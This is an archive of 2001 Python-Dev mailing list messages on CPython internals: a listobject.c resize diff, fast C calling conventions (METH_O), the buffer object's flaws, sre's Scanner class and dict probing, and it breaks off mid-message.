/cvsroot/python/python/dist/src/Objects/listobject.c,v retrieving revision 2.92 diff -c -r2.92 listobject.c *** Objects/listobject.c 2001/02/12 22:06:02 2.92 --- Objects/listobject.c 2001/05/25 19:04:07 *************** *** 9,24 **** #include /* For size_t */ #endif ! #define ROUNDUP(n, PyTryBlock) \ ! ((((n)+(PyTryBlock)-1)/(PyTryBlock))*(PyTryBlock)) static int roundupsize(int n) { ! if (n < 500) return ROUNDUP(n, 10); else ! return ROUNDUP(n, 100); } #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems)) --- 9,30 ---- #include /* For size_t */ #endif ! #define ROUNDUP(n, nbits) \ ! ( ((n) + (1<<(nbits)) - 1) >> (nbits) << (nbits) ) static int roundupsize(int n) { ! if ((n >> 9) == 0) ! return ROUNDUP(n, 3); ! else if ((n >> 13) == 0) ! return ROUNDUP(n, 7); ! else if ((n >> 17) == 0) return ROUNDUP(n, 10); + else if ((n >> 20) == 0) + return ROUNDUP(n, 13); else ! return ROUNDUP(n, 18); } #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems)) From martin@loewis.home.cs.tu-berlin.de Fri May 25 20:51:26 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 25 May 2001 21:51:26 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0E1E2C.4BC121B5@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> Message-ID: <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> > Now this would be more flexible if you would implement a scheme > which lets us put the parser string into the method list. The > call mechanism could then easily figure out how to call the > method and it would also be more easily extensible: > > {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, I'd like to hear other people's comment on this specific issue, so I guess I should probably write a PEP outlining the options. My immediate reaction to your proposal is that it only complicates the interface without any savings. We still can only support a limited number of calling conventions. E.g. it is not possible to write portable C code that does all the calling conventions for "l", "ll", "lll", "llll", and so on - you have to cast the function pointer to the right prototype, which must be done in source code. So with this interface, you may end up at run-time finding out that you cannot support the signature. With the current patch, you'd have to know to convert "OO" into METH_OO, which I think is not asked too much - and it gives you a compile-time error if you use an unsupported calling convention. > A parser marker "OO" would then call a method like this: > > method(self, arg0, arg1) > > and so on. That is indeed the plan, but since you have to code the parameter combinations in C code, you can only support so many of them. > allows implementing a generic scheme which > then again relies on PyArg_ParseTuple() to do the argument > parsing, e.g. "is#" could be implemented as: The point of the patch is to get rid of PyArg_ParseTuple in the "common case". For functions with complex calling conventions, getting rid of the PyArg_ParseTuple string parsing is not that important, since they are expensive, anyway (not that "is#" couldn't be supported, I'd call it METH_is_hash). > For optional arguments we'd need some convention which then > lets the called function add the default value as needed. For the moment, I'd only support "|O", and perhaps "|z"; an omitted argument would be represented as a NULL pointer. That means that "|i" couldn't participate in the fast calling convention - unless we translate that to void foo(PyObject*self, int i, bool ipresent); BTW, the most frequent function in my measurements that would make use of this convention is "OO|i:replace", which scores at 4.5%. Regards, Martin From gstein@lyra.org Fri May 25 21:27:52 2001 From: gstein@lyra.org (Greg Stein) Date: Fri, 25 May 2001 13:27:52 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0E5C50.6E365F69@STScI.Edu>; from Barrett@stsci.edu on Fri, May 25, 2001 at 09:21:20AM -0400 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> Message-ID: <20010525132752.B5402@lyra.org> On Fri, May 25, 2001 at 09:21:20AM -0400, Paul Barrett wrote: > "M.-A. Lemburg" wrote: > > > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > > Then you could write: buffer(ob).find('.'). > > > > > > You're totally missing the point with that suggestion. It does *not* > > suffice to add them to buffer objects. What about array objects? mmap > > objects? Random Joe Object who implements the buffer interface? > > > > That's the point: you can wrap all those into a buffer object > > and then use the buffer object methods to manipulate them. In > > that sense, buffer objects provide an adaptor to the underlying > > object which implements the needed methods. > > Sounds like you are trying to make the buffer object into something it > is not. The buffer object is intended to provide a Python-level object (with methods and behavior) for any other object which exports the buffer API (but not those particular methods/behavior). It was added for Python 1.5.2, but did not keep up with the methods added to the string object. Arguably, it is out of date rather than "[turning it into] something it is not." > Not that I have the foggiest idea what it is now, since it > hasn't much use and is badly broken. "badly" is overstating the problem. It caches a pointer when it shouldn't. This doesn't work well when using it with array objects or PIL's image objects. Most objects, it is fine. The buffer object is also very good for C/Python extensions and embedding code. It provides a Python-level view on a block of memory. Using a string object implies making a copy, and it removes the possibility for read/write access to that memory. And you state: "Not that I have the foggiest idea what it is now". If so, then wtf are you making statements about the buffer object's behavior? > I like your idea of sharing functions, I just don't think the buffer > object is the proper means. I think the buffer object should be > removed from Python and something better put in its place. (I'm not > talking about the buffer C/API, though this could also use an > overhaul, since it doesn't provide enough information to the receiving > method.) > > What I think we need is: > > 1) a malloc object which has a similar interface to the mmap object > with access protection, etc. This object would be the fundamental way > of getting memory. The string object would use it to allocate a chunk > of 'read-only' memory. Other objects would then know not to modify > the contents of the memory. If you wanted a reference or view of the > memory/buffer, you would get a reference to this object. You're talking about the buffer object that we have *today*. It can refer to another object (i.e. the memory exposed via the other object's buffer API), refer to memory, or it can allocate its own memory. The buffer object can be marked read-only, or read-write. > 2) objects supporting the buffer object should provide a view method > which returns a copy of themselves (and hence all their methods) and > can be used to get a pointer to a subset of its memory. In this way > the type of memory/buffer being accessed is known compared to the > current buffer object which only indicates the buffer is binary or > char data. In essence information about how the buffer should be used > is lost in the current buffer C/API. I'm not sure that I understand this paragraph. No... what needs to happen is to have the bug in PyBufferObject fixed. Then to refactor stringobject.c and stropmodule.c to move all of those byte-oriented processing functions into a new file such as Python/byteops.c (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c would be simple covers over the same functions. Those functions can then be used by PyBufferObject to implement the rest of the string methods on itself. This would leave us at MAL's suggested point: via the buffer object, we can perform all of the standard string methods/ops on any object that implements the buffer API. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mal@lemburg.com Fri May 25 22:16:32 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 23:16:32 +0200 Subject: [Python-Dev] Time for the yearly list.append() panic References: Message-ID: <3B0ECBB0.6798F4AB@lemburg.com> Tim Peters wrote: > > Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution. That's what I think too. There's really not much point in trying to work around poor malloc() implementations when we've already got the cure built into Python... I just wish Vladimir would resurface again to complete his great work (AFAIK, pymalloc still has problems with threads). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Fri May 25 22:38:15 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 23:38:15 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> Message-ID: <3B0ED0C7.F1A665EA@lemburg.com> "Martin v. Loewis" wrote: > > > Now this would be more flexible if you would implement a scheme > > which lets us put the parser string into the method list. The > > call mechanism could then easily figure out how to call the > > method and it would also be more easily extensible: > > > > {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, > > I'd like to hear other people's comment on this specific issue, so I > guess I should probably write a PEP outlining the options. > > My immediate reaction to your proposal is that it only complicates the > interface without any savings. We still can only support a limited > number of calling conventions. E.g. it is not possible to write > portable C code that does all the calling conventions for "l", "ll", > "lll", "llll", and so on - you have to cast the function pointer to > the right prototype, which must be done in source code. > > So with this interface, you may end up at run-time finding out that > you cannot support the signature. With the current patch, you'd have > to know to convert "OO" into METH_OO, which I think is not asked too > much - and it gives you a compile-time error if you use an unsupported > calling convention. True. It's unfortunate that C doesn't offer the reverse of varargs.h... > > A parser marker "OO" would then call a method like this: > > > > method(self, arg0, arg1) > > > > and so on. > > That is indeed the plan, but since you have to code the parameter > combinations in C code, you can only support so many of them. > > > allows implementing a generic scheme which > > then again relies on PyArg_ParseTuple() to do the argument > > parsing, e.g. "is#" could be implemented as: > > The point of the patch is to get rid of PyArg_ParseTuple in the > "common case". For functions with complex calling conventions, getting > rid of the PyArg_ParseTuple string parsing is not that important, > since they are expensive, anyway (not that "is#" couldn't be > supported, I'd call it METH_is_hash). > > > For optional arguments we'd need some convention which then > > lets the called function add the default value as needed. > > For the moment, I'd only support "|O", and perhaps "|z"; an omitted > argument would be represented as a NULL pointer. That means that "|i" > couldn't participate in the fast calling convention - unless we > translate that to > > void foo(PyObject*self, int i, bool ipresent); > > BTW, the most frequent function in my measurements that would make use > of this convention is "OO|i:replace", which scores at 4.5%. I was thinking of using pointer indirection for this: foo(PyObject *self, int *i) If i is given as argument, *i is set to the value, otherwise i is set to NULL. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one@home.com Fri May 25 23:11:43 2001 From: tim.one@home.com (Tim Peters) Date: Fri, 25 May 2001 18:11:43 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic In-Reply-To: <3B0ECBB0.6798F4AB@lemburg.com> Message-ID: [Tim] > Long-term we should teach PyMalloc about Python's realloc() > abuses and craft a cooperative solution. [MAL] > That's what I think too. There's really not much point in trying > to work around poor malloc() implementations when we've already > got the cure built into Python... The point *here* is that a simple localized patch could kill off a Frequently Irritating Complaint without further ado: on my personal cost/benefit scale, it's all I can *afford* to do now. PyMalloc likely won't solve it as-is x-platform, without new work to accommodate extreme realloc() abuse. > I just wish Vladimir would resurface again to complete his great > work I'd like him to come back even if he doesn't . > (AFAIK, pymalloc still has problems with threads). It has lock macros that haven't been #define'd to do anything yet. But part of the potential value of the Python core using its own allocator is to exploit the global interpreter lock to *not* lock in the allocator. Messy issues. Python should grow a cheaper platform-specific flavor of internal lock too. (Jeremy pointed out some code the other day that jumps through hoops to simulate a reentrant lock on top of a Python lock; an irony is that on Windows, the native lock *is* reentrant already, and Python jumps through hoops to make it act as if it weren't ) From mal@lemburg.com Fri May 25 23:07:00 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 00:07:00 +0200 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> <20010525132752.B5402@lyra.org> Message-ID: <3B0ED784.FC53D01@lemburg.com> Greg Stein wrote: > > No... what needs to happen is to have the bug in PyBufferObject fixed. Then > to refactor stringobject.c and stropmodule.c to move all of those > byte-oriented processing functions into a new file such as Python/byteops.c > (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c > would be simple covers over the same functions. > > Those functions can then be used by PyBufferObject to implement the rest of > the string methods on itself. > > This would leave us at MAL's suggested point: via the buffer object, we can > perform all of the standard string methods/ops on any object that implements > the buffer API. I wonder how we could achieve this without copy&pasting all the needed methods from stringobject.c to bufferobject.c.... all the string methods use the string object layout directly rather than just dealing with a pointer and a length. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From m.favas@per.dem.csiro.au Sat May 26 03:34:20 2001 From: m.favas@per.dem.csiro.au (Mark Favas) Date: Sat, 26 May 2001 10:34:20 +0800 Subject: [Python-Dev] Time for the yearly list.append() panic Message-ID: <3B0F162C.AD16E452@per.dem.csiro.au> [Tim wants to know whether his patch to listobject.c slows anything down on anyone's "oddball box"...] While in no way admitting that mine is an oddball box , it being a Tru64 Unix alpha processor machine, I do see a slowdown after applying the patch (measured on the test suite and on pystone). However, it's only of the order of 0.5 to 1%. slightly-oddly y'rs - Mark -- Mark Favas - m.favas@per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From tim.one@home.com Sat May 26 05:05:40 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 26 May 2001 00:05:40 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic In-Reply-To: <3B0F162C.AD16E452@per.dem.csiro.au> Message-ID: [Mark Favas] > [Tim wants to know whether his patch to listobject.c slows anything down > on anyone's "oddball box"...] > > While in no way admitting that mine is an oddball box , Heh -- of course not. I had more in mind obscure OSes like Linux . > it being a Tru64 Unix alpha processor machine, I do see a slowdown > after applying the patch (measured on the test suite and on pystone). > However, it's only of the order of 0.5 to 1%. Now that's very odd, since Alpha has about the slowest integer divsion on Earth, and every list append was doing an int div before the patch but not after. I'm afraid that timing the test suite before and after is a red herring, as several of the expensive tests have (pseudo)random components and can do an amount of work that varies depending on system time at the time random.py is first imported. pystone is even odder: the relevant code in listobject.c is never executed during pystone! I suspected that because pystone is an old synthetic Ada benchmark simulating a pile of integer systems programs, so pystone is unique among Python programs in not exercising any of Python's useful features -- a breakpoint in the debugger just now confirmed it (never did a list resize after compilation finished). So I'm pretty sure that after I check it in, you'll see a speedup instead . Get anywhere identifying why your other app is 20% slower (blast from the past)? From martin@loewis.home.cs.tu-berlin.de Sat May 26 06:28:32 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 26 May 2001 07:28:32 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0ED0C7.F1A665EA@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> Message-ID: <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> > I was thinking of using pointer indirection for this: > > foo(PyObject *self, int *i) > > If i is given as argument, *i is set to the value, otherwise > i is set to NULL. That is a good idea; I'll try to update my patch to more calling conventions. Regards, Martin From tim.one@home.com Sat May 26 07:44:04 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 26 May 2001 02:44:04 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0ED784.FC53D01@lemburg.com> Message-ID: The buffer object has been neglected for years: is that because it's in prime shape, or because nobody cares about it enough to maintain it? "The bug" has been known for years without any action taken to address it; the docs give up in spots and nobody addresses that either (like "The current policy seems to state that these characters may be multi-byte characters" -- well, yes or no?); the builtin buffer() function isn't called anywhere in the std test suite; the file object still has an undocumented readinto() method that just confuses people who bump into it; and it's so obscure in daily life that it appears Guido didn't even think of it when adding iterators for the other sequence types. I expect that answers my question . Is someone (Greg? MAL?) going to champion it now? That would be cool. About combining strop and buffers and strings, don't forget unicodeobject.c: that's got oodles of basically duplicate code too. /F suggested dealing with the minor differences via maintaining one code file that gets compiled multiple times w/ appropriate #defines. From tim.one@home.com Sat May 26 09:14:06 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 26 May 2001 04:14:06 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: I don't want to see us duplicate the guts of PyArg_ParseTuple() inside do_call_special(). METH_O is a cool idea, METH_l is marginal, and the new code is already slower for METH_O than it needs to be in order to support the *possibility* of METH_l too (stacks and loops and switch stmts and an extra layer of do_call_special function call "just in case"). Do METH_O, convert every "O" function to use it, declare victory, and enjoy the weekend . 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- size-ly y'rs - tim From m.favas@per.dem.csiro.au Sat May 26 09:30:29 2001 From: m.favas@per.dem.csiro.au (Mark Favas) Date: Sat, 26 May 2001 16:30:29 +0800 Subject: [Python-Dev] Time for the yearly list.append() panic References: Message-ID: <3B0F69A5.6F569573@per.dem.csiro.au> [Tim tells Mark that his observations reflect more Brownian motion (pseudo!) than reality...] > [Mark Favas] > > it being a Tru64 Unix alpha processor machine, I do see a slowdown > > after applying the patch (measured on the test suite and on pystone). > > However, it's only of the order of 0.5 to 1%. > > Now that's very odd, since Alpha has about the slowest integer divsion on > Earth, and every list append was doing an int div before the patch but not > after. > > I'm afraid that timing the test suite before and after is a red herring, as > several of the expensive tests have (pseudo)random components and can do an > amount of work that varies depending on system time at the time random.py is > first imported. > > pystone is even odder: the relevant code in listobject.c is never executed > during pystone! I suspected that because pystone is an old synthetic Ada > benchmark simulating a pile of integer systems programs, so pystone is > unique among Python programs in not exercising any of Python's useful > features -- a breakpoint in the debugger just now confirmed it (never > did a list resize after compilation finished). > > So I'm pretty sure that after I check it in, you'll see a speedup instead > . OK : this time, instead of making unwarranted assumptions about test suites and pystones , I wrote and ran a test that I _think_ should exercise the code (at least, it does lots of list.append()s), and, yes, the newly checked-in code's about 3-4% faster compared with the original version of, well, days ago. > > Get anywhere identifying why your other app is 20% slower (blast from the > past)? No, not yet. The profiling results at first eyeball seemed hard to match up, so I put it off for a rainy weekend. And Perth's drought has just broken... Will attempt to make sense of it. Interesting that Marc Andre seemed to get a somewhat similar slowdown between 1.52 and 2.0. -- Mark Favas - m.favas@per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From mal@lemburg.com Sat May 26 10:54:12 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 11:54:12 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> Message-ID: <3B0F7D44.1A12CE0F@lemburg.com> "Martin v. Loewis" wrote: > > > I was thinking of using pointer indirection for this: > > > > foo(PyObject *self, int *i) > > > > If i is given as argument, *i is set to the value, otherwise > > i is set to NULL. > > That is a good idea; I'll try to update my patch to more calling > conventions. This morning another idea popped up which could help us with handling generic callings schemes: How about making *all* parameters pointers ?! The calling mechanism would then just have to deal with an changing number of parameters and not with different types (this is how PyArg_ParseTuple() works too if I remember correctly). We could easily provide calling schemes for 1 - n arguments that way and the types of these arguments would be defined by the parser string just like before. Examples: foo(PyObject *self, PyObject *obj, int *i) bar(PyObject *self, int *i, int *j, char *txt, int *len) To call these, the calling mechanism would have to cast these to: foo(void *, void *, void *) bar(void *, void *, void *, void *, void *) Wouldn't this work ? -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From paulp@ActiveState.com Sat May 26 16:02:08 2001 From: paulp@ActiveState.com (Paul Prescod) Date: Sat, 26 May 2001 08:02:08 -0700 Subject: [Python-Dev] Scanner Message-ID: <3B0FC570.17707787@ActiveState.com> What ever happened to the sre Scanner? It seemed like a good idea but it was not documented and it doesn't work for me. Is it just a case of nobody got around to the documentation or have we decided against it? Here's the code that doesn't work for me: from sre import Scanner scanner = Scanner([ (r"[a-zA-Z_]\w*", None), (r"\d+\.\d*", None), (r"\d+", None), (r"=|\+|-|\*|/", None), (r"\s+", None), ]) tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") Traceback (most recent call last): File "junk.py", line 11, in ? tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") File "c:\program files\python21\lib\sre.py", line 254, in scan action = self.lexicon[m.lastindex][1] TypeError: sequence index must be integer m.lastindex is None -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From mal@lemburg.com Sat May 26 16:47:47 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 17:47:47 +0200 Subject: [Python-Dev] strop vs. string References: Message-ID: <3B0FD023.C4588919@lemburg.com> Tim Peters wrote: > > The buffer object has been neglected for years: is that because it's in > prime shape, or because nobody cares about it enough to maintain it? "The > bug" has been known for years without any action taken to address it; the > docs give up in spots and nobody addresses that either (like "The current > policy seems to state that these characters may be multi-byte characters" -- > well, yes or no?); the builtin buffer() function isn't called anywhere in > the std test suite; the file object still has an undocumented readinto() > method that just confuses people who bump into it; and it's so obscure in > daily life that it appears Guido didn't even think of it when adding > iterators for the other sequence types. > > I expect that answers my question . Is someone (Greg? MAL?) going to > champion it now? That would be cool. I believe that nobody really likes the buffer interface enough to let the world know about it, except maybe Greg ;-) Even the idea of replacing the usage of strings as data buffers with buffer object didn't get very far; common habits are simply hard to break. > About combining strop and buffers and strings, don't forget unicodeobject.c: > that's got oodles of basically duplicate code too. /F suggested dealing > with the minor differences via maintaining one code file that gets compiled > multiple times w/ appropriate #defines. Hmm, that only saves us a few kB in source, but certainly not in the object files. The better idea would be making the types subclass from a generic abstract string object -- I just don't know how this will be possible with Guido's type patches. We'll just have to wait, I guess. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one@home.com Sat May 26 22:15:11 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 26 May 2001 17:15:11 -0400 Subject: [Python-Dev] Scanner In-Reply-To: <3B0FC570.17707787@ActiveState.com> Message-ID: [Paul Prescod] > What ever happened to the sre Scanner? It seemed like a good idea > but it was not documented I previously urged /F to document, and Python-Dev to accept, the .lastindex and .lastgroup match object extensions, but to date got no response. Whether to adopt the Scanner class too is fuzzier, since AFAICT almost nobody has figured out how to use it. > and it doesn't work for me. This isn't a code problem, it's a failure to reverse-engineer the undocumeted API . > Is it just a case of nobody got around to the documentation or have > we decided against it? WRT Scanner, partly the former, nothing of the latter, mostly that there's been no discussion of the API at all. WRT lastindex and lastgroup, I think purely the former. > Here's the code that doesn't work for me: > > from sre import Scanner > > scanner = Scanner([ > (r"[a-zA-Z_]\w*", None), > (r"\d+\.\d*", None), > (r"\d+", None), > (r"=|\+|-|\*|/", None), > (r"\s+", None), > ]) 1. Every tokenization regexp must contain exactly one capturing group. The lack above is the source of your later TypeError. Unclear to me whether that was the intent, or ust the way the code happens to work today. 2. When an action is None, the substring matched by the pattern will be thrown away. You need to supply non-None actions if you want anything to show up in the token list. > tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") > > Traceback (most recent call last): > File "junk.py", line 11, in ? > tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") > File "c:\program files\python21\lib\sre.py", line 254, in scan > action = self.lexicon[m.lastindex][1] > TypeError: sequence index must be integer > > m.lastindex is None Here's a working rewrite: from sre import Scanner def retrieve(scanner, group): return group scanner = Scanner([ (r"([a-zA-Z_]\w*)", retrieve), (r"(\d+\.\d*)", retrieve), (r"(\d+)", retrieve), (r"(=|\+|-|\*|/)", retrieve), (r"(\s+)", None), # ignore whitespace ]) tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") print tokens, `tail` That prints ['sum', '=', '3', '*', 'foo', '+', '312.50', '+', 'bar'] '' In return for that, how about *you* supply a works-on-Windows rewrite of test_urllib2.py? You know more about that than anyone, and the test has been failing for weeks. From MarkH@ActiveState.com Sun May 27 03:39:43 2001 From: MarkH@ActiveState.com (Mark Hammond) Date: Sun, 27 May 2001 12:39:43 +1000 Subject: [Python-Dev] strop vs. string In-Reply-To: Message-ID: [Tim] > The buffer object has been neglected for years: is that because it's in > prime shape, or because nobody cares about it enough to maintain it? My take is a little different. I think people could be convinced to care about it, and indeed I do. However, it has one fatal flaw, and no one seems to know what to do about it. The problem is the one best demonstrated with the array module - if you get a pointer to the buffer interface for an array object, but the array then resizes itself, the buffer pointer dangles. There have been a few attempts over time to raise the buffer profile, but this design flaw leaves people scratching their head - it is hard to press for adoption of a feature that has a known crash hiding away. However, addressing this problem is difficult. Guido appears unconvinced that buffer objects and interfaces are that worthwhile. It appears no one else knows how to proceed in the face of this ambivalence - that describes my take even if no one elses. The-buffer-is-dead,-long-live-the-buffer ly, Mark. From tim.one@home.com Sun May 27 07:34:53 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 27 May 2001 02:34:53 -0400 Subject: [Python-Dev] Next dict crusade Message-ID: I'm still trying to work off the backlog of ignored dict ideas. Way back here: http://mail.python.org/pipermail/python-dev/2000-December/011085.html Christian Tismer suggested using polynomial division instead of multiplication for generating the probe sequence, as a way to get all the bits of the hash code into play. The desirability of doing that is illustrated by, e.g., this program: def f(keys): from time import clock d = {} s = clock() for k in keys: d[k] = k f = clock() print "build time %.3f" % (f-s) s = clock() for k in keys: assert d.has_key(k) f = clock() print "search time %.3f" % (f-s) # Excellent performance. keys = range(20000) for i in range(5): f(keys) # Terrible performance; > 500x slower. keys = [i << 16 for i in range(20000)] for i in range(5): f(keys) Christian had a very clever (cheap and effective) solution: Old algortithm (multiplication): shift the index left by 1 if index > mask: xor the index with the generator polynomial New algorithm (division): if low bit of index set: xor the index with the generator polynomial shift the index right by 1 where "index" should really read "increment", and unlike today we do not mask off any of the bits of the initial increment (and that's what lets *all* the bits of the hash code come into play; there's no point to doing this otherwise). I've since discovered that it's got a fatal rare flaw: the new algorithm can generate a 0 increment, while the old algorithm cannot. Example: poly is 131 and hash is 145. Because we don't mask off any bits in computing the initial increment, the initial increment is computed as incr = hash ^ (hash >> 3) == 145 ^ (145 >> 3) == 145 ^ 18 == 131 == poly So if we don't hit on the first probe, the new if low bit of index set: xor the index with the generator polynomial shift the index right by 1 business sets incr to 0, and the result is an infinite loop (0 is a fixed point). I hate to add another branch to this. As is, the existing branch in both the old and new ways is of the worst possible kind: it's taken half the time, with a pseudo-random distribution. So there's not a branch-prediction gimmick on earth it won't fool. Note that there's no reasonable way to identify "bad values" for incr before the loop starts, either -- there's really no way to tell whether incr mod poly is 0 without a loop to do division steps until incr < poly (if incr < poly and incr != 0, incr can never become 0, so there's no more need to test after reaching that point). Such a "pre loop" would cost more than the existing loop in most cases, as we usually get out of the existing loop today on its first iteration. But in that case, what am I worried about ? time-for-a-checkin-ly y'rs - tim From martin@loewis.home.cs.tu-berlin.de Sun May 27 10:01:14 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 27 May 2001 11:01:14 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0F7D44.1A12CE0F@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> Message-ID: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> > To call these, the calling mechanism would have to cast these > to: > > foo(void *, void *, void *) > bar(void *, void *, void *, void *, void *) > > Wouldn't this work ? I think it would work, but I doubt it would save much compared to the existing approach. The main point of this patch is to improve efficiency, and (according to Jeremy's analysis), most of the time for calling a function is spend in PyArg_ParseTuple. So if we replace it with another interface that also relies on parsing a string, I doubt we'll improve efficiency. IOW, I won't implement that approach. If you do, I'd be curious to hear the results, of course. Regards, Martin P.S. There would be still cases where PyArg_ParseTuple is needed, e.g. for "O!". From mal@lemburg.com Sun May 27 11:26:27 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sun, 27 May 2001 12:26:27 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> Message-ID: <3B10D653.4D81E280@lemburg.com> "Martin v. Loewis" wrote: > > > To call these, the calling mechanism would have to cast these > > to: > > > > foo(void *, void *, void *) > > bar(void *, void *, void *, void *, void *) > > > > Wouldn't this work ? > > I think it would work, but I doubt it would save much compared to the > existing approach. The main point of this patch is to improve > efficiency, and (according to Jeremy's analysis), most of the time for > calling a function is spend in PyArg_ParseTuple. So if we replace it > with another interface that also relies on parsing a string, I doubt > we'll improve efficiency. That's the point: we are not replacing PyArg_ParseTuple() with another parsing mechanism, we are only using PyArg_ParseTuple() as fallback solution for parser strings for which we don't provide a special case implementation. The idea is to simply do a strcmp() (*) for a few common combinations (like e.g. "O" and "OO") and then provide the same special case handling like you do with e.g. METH_O. The result would be almost the same w/r to performance and code reduction as with your approach. The only addition would be using strcmp() instead of a switch statement. The advantage of this approach is that while you can still provide special case handling of common parser strings, you can also provide generic APIs for most other parser strings by reverting to PyArg_ParseTuple() for these. > IOW, I won't implement that approach. If you do, I'd be curious to > hear the results, of course. I'll see what I can do... > P.S. There would be still cases where PyArg_ParseTuple is needed, > e.g. for "O!". True... can't win 'em all ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Sun May 27 11:30:48 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sun, 27 May 2001 12:30:48 +0200 Subject: [Python-Dev] strop vs. string References: Message-ID: <3B10D758.3741AC2F@lemburg.com> Mark Hammond wrote: > > [Tim] > > The buffer object has been neglected for years: is that because it's in > > prime shape, or because nobody cares about it enough to maintain it? > > My take is a little different. I think people could be convinced to care > about it, and indeed I do. However, it has one fatal flaw, and no one seems > to know what to do about it. > > The problem is the one best 